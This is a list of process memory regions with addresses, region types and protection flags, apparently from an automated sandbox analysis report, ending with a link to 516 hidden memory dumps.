7DF4A0210000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D753FF000
|
stack
|
page read and write
|
||
|
21E8E4DF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
21EA61E8000
|
heap
|
page read and write
|
||
|
238831E8000
|
heap
|
page read and write
|
||
|
21E8F06F000
|
trusted library allocation
|
page read and write
|
||
|
1113000
|
heap
|
page read and write
|
||
|
21E8F2D4000
|
trusted library allocation
|
page read and write
|
||
|
2092EA1C000
|
heap
|
page read and write
|
||
|
21EA5E0D000
|
heap
|
page read and write
|
||
|
7FFD9B610000
|
trusted library allocation
|
page read and write
|
||
|
694E000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
EF9000
|
stack
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
21EA5F50000
|
heap
|
page read and write
|
||
|
5B7E000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
5A50000
|
trusted library allocation
|
page read and write
|
||
|
238831BC000
|
heap
|
page read and write
|
||
|
23895160000
|
trusted library allocation
|
page read and write
|
||
|
1098000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
1ABE0299000
|
heap
|
page read and write
|
||
|
21E8BE98000
|
heap
|
page read and write
|
||
|
1080000
|
heap
|
page read and write
|
||
|
58C0000
|
trusted library allocation
|
page read and write
|
||
|
21E8F057000
|
trusted library allocation
|
page read and write
|
||
|
121A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page execute and read and write
|
||
|
58B0000
|
trusted library allocation
|
page read and write
|
||
|
14C8000
|
trusted library allocation
|
page read and write
|
||
|
238830E0000
|
heap
|
page read and write
|
||
|
21E8F071000
|
trusted library allocation
|
page read and write
|
||
|
209306E3000
|
heap
|
page read and write
|
||
|
21E8D98F000
|
trusted library allocation
|
page read and write
|
||
|
6E0E000
|
stack
|
page read and write
|
||
|
21EA61B4000
|
heap
|
page read and write
|
||
|
5397000
|
heap
|
page read and write
|
||
|
26D8B7E000
|
stack
|
page read and write
|
||
|
2389D4A0000
|
heap
|
page read and write
|
||
|
26D8879000
|
stack
|
page read and write
|
||
|
589D000
|
trusted library allocation
|
page read and write
|
||
|
1222000
|
trusted library allocation
|
page read and write
|
||
|
52F0000
|
heap
|
page read and write
|
||
|
1160000
|
heap
|
page read and write
|
||
|
21E8BFF5000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
21E8BE58000
|
heap
|
page read and write
|
||
|
21E8BE9A000
|
heap
|
page read and write
|
||
|
7FFD9B64B000
|
trusted library allocation
|
page read and write
|
||
|
26D88F7000
|
stack
|
page read and write
|
||
|
21EA61C3000
|
heap
|
page read and write
|
||
|
2093080A000
|
heap
|
page read and write
|
||
|
6B4C000
|
stack
|
page read and write
|
||
|
2389D230000
|
heap
|
page execute and read and write
|
||
|
5369000
|
heap
|
page read and write
|
||
|
58A2000
|
trusted library allocation
|
page read and write
|
||
|
21E8F6A5000
|
trusted library allocation
|
page read and write
|
||
|
23884EC0000
|
trusted library allocation
|
page read and write
|
||
|
BAC000
|
stack
|
page read and write
|
||
|
1210000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23883100000
|
heap
|
page read and write
|
||
|
23884B00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6E0000
|
trusted library allocation
|
page read and write
|
||
|
21EA5F30000
|
heap
|
page read and write
|
||
|
572C000
|
stack
|
page read and write
|
||
|
684D000
|
stack
|
page read and write
|
||
|
21EA6150000
|
heap
|
page read and write
|
||
|
21E8DEF1000
|
trusted library allocation
|
page read and write
|
||
|
20930817000
|
heap
|
page read and write
|
||
|
21EA5EB7000
|
heap
|
page execute and read and write
|
||
|
1220000
|
trusted library allocation
|
page read and write
|
||
|
5CD0000
|
heap
|
page read and write
|
||
|
2092E8C5000
|
heap
|
page read and write
|
||
|
7FFD9B7B1000
|
trusted library allocation
|
page read and write
|
||
|
11E0000
|
trusted library allocation
|
page read and write
|
||
|
8F96BFE000
|
stack
|
page read and write
|
||
|
5876000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B63D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2092E9A0000
|
heap
|
page read and write
|
||
|
14BE000
|
stack
|
page read and write
|
||
|
5719CFE000
|
stack
|
page read and write
|
||
|
5A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
23884B35000
|
heap
|
page read and write
|
||
|
21E8F6A1000
|
trusted library allocation
|
page read and write
|
||
|
20930686000
|
heap
|
page read and write
|
||
|
5A00000
|
trusted library allocation
|
page read and write
|
||
|
5479000
|
heap
|
page read and write
|
||
|
21EA6188000
|
heap
|
page read and write
|
||
|
1ABE05C0000
|
heap
|
page read and write
|
||
|
238834E5000
|
heap
|
page read and write
|
||
|
209306CB000
|
heap
|
page read and write
|
||
|
21E8D7C0000
|
trusted library allocation
|
page read and write
|
||
|
2092EA5D000
|
heap
|
page read and write
|
||
|
21EA5D60000
|
heap
|
page read and write
|
||
|
2092E7C0000
|
heap
|
page read and write
|
||
|
6D0C000
|
stack
|
page read and write
|
||
|
209306CC000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
5719C7E000
|
stack
|
page read and write
|
||
|
571A7CA000
|
stack
|
page read and write
|
||
|
26D96CE000
|
stack
|
page read and write
|
||
|
21EA5E3C000
|
heap
|
page read and write
|
||
|
21E8D7D0000
|
heap
|
page readonly
|
||
|
21E8BEDA000
|
heap
|
page read and write
|
||
|
21E8D7E0000
|
heap
|
page read and write
|
||
|
238834E0000
|
heap
|
page read and write
|
||
|
7FFD9B632000
|
trusted library allocation
|
page read and write
|
There are 516 hidden memdumps, click here to show them.